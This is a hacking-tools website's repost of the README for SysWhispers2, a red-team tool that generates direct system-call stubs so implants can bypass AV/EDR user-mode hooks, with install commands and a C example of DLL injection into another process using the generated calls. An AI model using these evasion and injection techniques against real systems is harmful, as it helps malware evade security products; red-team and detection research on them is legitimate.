• Home
  • Become a Hacker
    • Get Started
    • Hacker Mindset
    • Roadmap
    • Simple Setup – Hacker 101
    • Types of Hackers
    • Recommended Courses
  • Boot People Offline
  • Courses
    • All Hacking Courses
    • Cyber Security School
  • CTF
    • Beginners to Advanced Guide
    • Create your own CTF box
    • Field and Resources Guide
    • Platforms & Wargames
    • Tools Used for Solving CTF
    • Writeups
  • Dark Web
    • Beginners Guide
    • Darknet Markets
    • Darkweb 101 (Anonymity Guide)
    • Dark Web OSINT Tools
    • Hacking Forums
    • Latest News
    • Onion Links
  • Hacker Gadgets
  • Hacking Books
  • Tools Directory
Menu
  • Home
  • Become a Hacker
    • Get Started
    • Hacker Mindset
    • Roadmap
    • Simple Setup – Hacker 101
    • Types of Hackers
    • Recommended Courses
  • Boot People Offline
  • Courses
    • All Hacking Courses
    • Cyber Security School
  • CTF
    • Beginners to Advanced Guide
    • Create your own CTF box
    • Field and Resources Guide
    • Platforms & Wargames
    • Tools Used for Solving CTF
    • Writeups
  • Dark Web
    • Beginners Guide
    • Darknet Markets
    • Darkweb 101 (Anonymity Guide)
    • Dark Web OSINT Tools
    • Hacking Forums
    • Latest News
    • Onion Links
  • Hacker Gadgets
  • Hacking Books
  • Tools Directory
Search
Close
  • Home
  • 2021
  • January
  • 17
  • SysWhispers2 – AV/EDR Evasion Via Direct System Calls

SysWhispers2 – AV/EDR Evasion Via Direct System Calls

January 17, 2021 Comments Off on SysWhispers2 – AV/EDR Evasion Via Direct System Calls
SysWhispers2 - AV/EDR Evasion Via Direct System Calls cybersecurity ethical hacking hack android hack app hack wordpress hacker news hacking hacking tools for windows keylogger kit kitploit password brute force penetration testing pentest pentest android pentest linux pentest toolkit pentest tools spy tool kit spyware tools

SysWhispers helps with evasion by generating header/ASM files implants can use to make direct system calls.

All core syscalls are supported and example generated files available in the example-output/ folder.

Difference Between SysWhispers 1 and 2

The usage is almost identical to SysWhispers1 but you don’t have to specify which versions of Windows to support. Most of the changes are under the hood. It no longer relies on @j00ru‘s syscall tables, and instead uses the “sorting by system call address” technique popularized by @modexpblog. This significantly reduces the size of the syscall stubs.

The specific implementation in SysWhispers2 is a variation of @modexpblog’s code. One difference is that the function name hashes are randomized on each generation. @ElephantSe4l, who had published this technique earlier, has another implementation based in C++17 which is also worth checking out.

The original SysWhispers repository is still up but may be deprecated in the future.

Introduction

Various security products place hooks in user-mode API functions which allow them to redirect execution flow to their engines and detect for suspicious behaviour. The functions in ntdll.dll that make the syscalls consist of just a few assembly instructions, so re-implementing them in your own implant can bypass the triggering of those security product hooks. This technique was popularized by @Cn33liz and his blog post has more technical details worth reading.

SysWhispers provides red teamers the ability to generate header/ASM pairs for any system call in the core kernel image (ntoskrnl.exe). The headers will also include the necessary type definitions.

Installation

> git clone https://github.com/jthuraisamy/SysWhispers2.git
> cd SysWhispers2
> py .syswhispers.py --help

Usage and Examples

Command Lines

# Export all functions with compatibility for all supported Windows versions (see example-output/).
py .syswhispers.py --preset all -o syscalls_all

# Export just the common functions (see below for list).
py .syswhispers.py --preset common -o syscalls_common

# Export NtProtectVirtualMemory and NtWriteVirtualMemory with compatibility for all versions.
py .syswhispers.py --functions NtProtectVirtualMemory,NtWriteVirtualMemory -o syscalls_mem

Script Output

PS C:ProjectsSysWhispers2> py .syswhispers.py --preset common --out-file syscalls_common

. ,--.
,-. . . ,-. . , , |-. o ,-. ,-. ,-. ,-. ,-. /
`-. | | `-. |/|/ | | | `-. | | |-' | `-. ,-'
`-' `-| `-' ' ' ' ' ' `-' |-' `-' ' `-' `---
/| | @Jackson_T
`-' ' @modexpblog, 2021

SysWhispers2: Why call the kernel when you can whisper?

Common functions selected.

Complete! Files written to:
syscalls_common.h
syscalls_common.c
syscalls_common_stubs.asm

Before-and-After Example of Classic CreateRemoteThread DLL Injection

py .syswhispers.py -f NtAllocateVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx -o syscalls
#include <Windows.h>

void InjectDll(const HANDLE hProcess, const char* dllPath)
{
LPVOID lpBaseAddress = VirtualAllocEx(hProcess, NULL, strlen(dllPath), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
LPVOID lpStartAddress = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");

WriteProcessMemory(hProcess, lpBaseAddress, dllPath, strlen(dllPath), nullptr);
CreateRemoteThread(hProcess, nullptr, 0, (LPTHREAD_START_ROUTINE)lpStartAddress, lpBaseAddress, 0, nullptr);
}
#include <Windows.h>
#include "syscalls.h" // Import the generated header.

void InjectDll(const HANDLE hProcess, const char* dllPath)
{
HANDLE hThread = NULL;
LPVOID lpAllocationStart = nullptr;
SIZE_T szAllocationSize = strlen(dllPath);
LPVOID lpStartAddress = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");

NtAllocateVirtualMemory(hProcess, &lpAllocationStart, 0, (PULONG)&szAllocationSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
NtWriteVirtualMemory(hProcess, lpAllocationStart, (PVOID)dllPath, strlen(dllPath), nullptr);
NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, hProcess, lpStartAddress, lpAllocationStart, FALSE, 0, 0, 0, nullptr);
}

Common Functions

Using the --preset common switch will create a header/ASM pair with the following functions:

  • NtCreateProcess (CreateProcess)
  • NtCreateThreadEx (CreateRemoteThread)
  • NtOpenProcess (OpenProcess)
  • NtOpenThread (OpenThread)
  • NtSuspendProcess
  • NtSuspendThread (SuspendThread)
  • NtResumeProcess
  • NtResumeThread (ResumeThread)
  • NtGetContextThread (GetThreadContext)
  • NtSetContextThread (SetThreadContext)
  • NtClose (CloseHandle)
  • NtReadVirtualMemory (ReadProcessMemory)
  • NtWriteVirtualMemory (WriteProcessMemory)
  • NtAllocateVirtualMemory (VirtualAllocEx)
  • NtProtectVirtualMemory (VirtualProtectEx)
  • NtFreeVirtualMemory (VirtualFreeEx)
  • NtQuerySystemInformation (GetSystemInfo)
  • NtQueryDirectoryFile
  • NtQueryInformationFile
  • NtQueryInformationProcess
  • NtQueryInformationThread
  • NtCreateSection (CreateFileMapping)
  • NtOpenSection
  • NtMapViewOfSection
  • NtUnmapViewOfSection
  • NtAdjustPrivilegesToken (AdjustTokenPrivileges)
  • NtDeviceIoControlFile (DeviceIoControl)
  • NtQueueApcThread (QueueUserAPC)
  • NtWaitForMultipleObjects (WaitForMultipleObjectsEx)

Importing into Visual Studio

  1. Copy the generated H/C/ASM files into the project folder.
  2. In Visual Studio, go to Project → Build Customizations… and enable MASM.
  3. In the Solution Explorer, add the .h and .c/.asm files to the project as header and source files, respectively.
  4. Go to the properties of the ASM file, and set the Item Type to Microsoft Macro Assembler.
  5. Ensure that the project platform is set to x64. 32-bit projects are not supported at this time.

Caveats and Limitations

  • Only 64-bit Windows is supported at this time.
  • System calls from the graphical subsystem (win32k.sys) are not supported.
  • Tested on Visual Studio 2019 (v142) with Windows 10 SDK.

Troubleshooting

  • Type redefinitions errors: a project may not compile if typedefs in syscalls.h have already been defined.
    • Ensure that only required functions are included (i.e. --preset all is rarely necessary).
    • If a typedef is already defined in another used header, then it could be removed from syscalls.h.

Credits

Developed by @Jackson_T and @modexpblog, but builds upon the work of many others:

  • @FoxHex0ne for cataloguing many function prototypes and typedefs in a machine-readable format.
  • @PetrBenes, NTInternals.net team, and MSDN for additional prototypes and typedefs.
  • @Cn33liz for the initial Dumpert POC implementation.

Related Articles and Projects

  • @modexpblog: Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams
  • @hodg87: Malware Mitigation when Direct System Calls are Used
  • @Cn33liz: Combining Direct System Calls and sRDI to bypass AV/EDR (Code)
  • @0x00dtm: Userland API Monitoring and Code Injection Detection
  • @0x00dtm: Defeating Userland Hooks (ft. Bitdefender) (Code)
  • @mrgretzky: Defeating Antivirus Real-time Protection From The Inside
  • @SpecialHoang: Bypass EDR’s memory protection, introduction to hooking (Code)
  • @xpn and @domchell: Silencing Cylance: A Case Study in Modern EDRs
  • @mrjefftang: Universal Unhooking: Blinding Security Software (Code)
  • @spotheplanet: Full DLL Unhooking with C++
  • @hasherezade: Floki Bot and the stealthy dropper
  • @hodg87: Latest Trickbot Variant has New Tricks Up Its Sleeve

References to SysWhispers

  • @JFaust_: Process Injection Part 1, Part 2, and Alaris loader project (Code)
  • @0xPat: Malware Development Part 2
  • @brsn76945860: Implementing Syscalls In The CobaltStrike Artifact Kit
  • @Cn33liz and @_DaWouw: Direct Syscalls in Beacon Object Files (Code)
Download SysWhispers2

Post navigation

JTAGulator: Assisted discovery of on-chip debug interfaces
Garud v1.2 releases: automation tool that scans sub-domains, sub-domain takeover

Related Articles

BugBountyScanner - A Bash Script And Docker Image For Bug Bounty Reconnaissance

BugBountyScanner – A Bash Script And Docker Image For Bug Bounty Reconnaissance

- Hack Tools
February 24, 2021
onionshare v2.3.1 releases: Securely and anonymously share file

onionshare v2.3.1 releases: Securely and anonymously share file

- Hack Tools
February 24, 2021
conjur

conjur v1.11.3 releases: secures secrets used by privileged users and machine identities

- Hack Tools
February 24, 2021
hacker gadgets
hacker phone covers

Recent Posts

BugBountyScanner - A Bash Script And Docker Image For Bug Bounty Reconnaissance

BugBountyScanner – A Bash Script And Docker Image For Bug Bounty Reconnaissance

February 24, 2021
CVE-2021-21972

CVE-2021-21972, CVE-2021-21974: VMware vCenter Server and ESXI Vulnerabilities Alert

February 24, 2021
onionshare v2.3.1 releases: Securely and anonymously share file

onionshare v2.3.1 releases: Securely and anonymously share file

February 24, 2021
conjur

conjur v1.11.3 releases: secures secrets used by privileged users and machine identities

February 24, 2021
HaE: BurpSuite Highlighter and Extractor

HaE – BurpSuite Highlighter And Extractor

February 23, 2021
Australian Man Sentenced for Selling Ecstasy on the Darkweb

Australian Man Sentenced for Selling Ecstasy on the Darkweb

February 23, 2021

Social Media Hacking

SocialPath – Track users across Social Media Platforms

SocialPath – Track users across Social Media Platforms

- Social Media Hacking
October 16, 2019October 16, 2019

SocialPath is a django application for gathering social media intelligence on specific username. It checks for Twitter, Instagram, Facebook, Reddit...

SocialScan – Check Email Address and Username Availability on Online Platforms

SocialScan – Check Email Address and Username Availability on Online Platforms

June 17, 2019
Shellphish – Phishing Tool For 18 Social Media Apps

Shellphish – Phishing Tool For 18 Social Media Apps

June 10, 2019July 27, 2019
WhatsApp Hacking using QRLJacking

WhatsApp Hacking using QRLJacking

May 2, 2019May 19, 2019
How to Hack any Facebook Account with Z-Shadow

How to Hack any Facebook Account with Z-Shadow

April 26, 2019June 29, 2020
hacker buffs
ABOUT US

Haxf4rall is a collective, a good starting point and provides a variety of quality material for cyber security professionals.

Our primary focus revolves around the latest tools released in the Infosec community and provide a platform for developers to showcase their skillset and current projects.

COMPANY
  • Contact Us
  • Disclaimer
  • Hacker Gadgets
  • LANC Remastered
  • PCPS IP Puller
  • Privacy Policy
  • Sitemap
  • Submit your Tool
Menu
  • Contact Us
  • Disclaimer
  • Hacker Gadgets
  • LANC Remastered
  • PCPS IP Puller
  • Privacy Policy
  • Sitemap
  • Submit your Tool
Live Chat
RESOURCES
  • Attack Process
  • Become a Hacker
  • Career Pathways
  • Dark Web
  • Hacking Books
  • Practice Your Skills
  • Recommended Courses
  • Simple Setup – Hacker 101
Menu
  • Attack Process
  • Become a Hacker
  • Career Pathways
  • Dark Web
  • Hacking Books
  • Practice Your Skills
  • Recommended Courses
  • Simple Setup – Hacker 101
Get Started
TOOLBOX
  • Anonymity
  • Bruteforce
  • DoS – Denial of Service
  • Information Gathering
  • Phishing
  • SQL Injection
  • Vulnerability Scanners
  • Wifi Hacking
Menu
  • Anonymity
  • Bruteforce
  • DoS – Denial of Service
  • Information Gathering
  • Phishing
  • SQL Injection
  • Vulnerability Scanners
  • Wifi Hacking
Tools Directory

2014 – 2020 | Haxf4rall.com               Stay Connected:

Facebook
Twitter
Google-plus
Wordpress
Please wait...

Join Our Community

Subscribe now and get your free HACKERS HANDBOOK

Don't Worry ! You will not be spammed
SIGN UP FOR NEWSLETTER NOW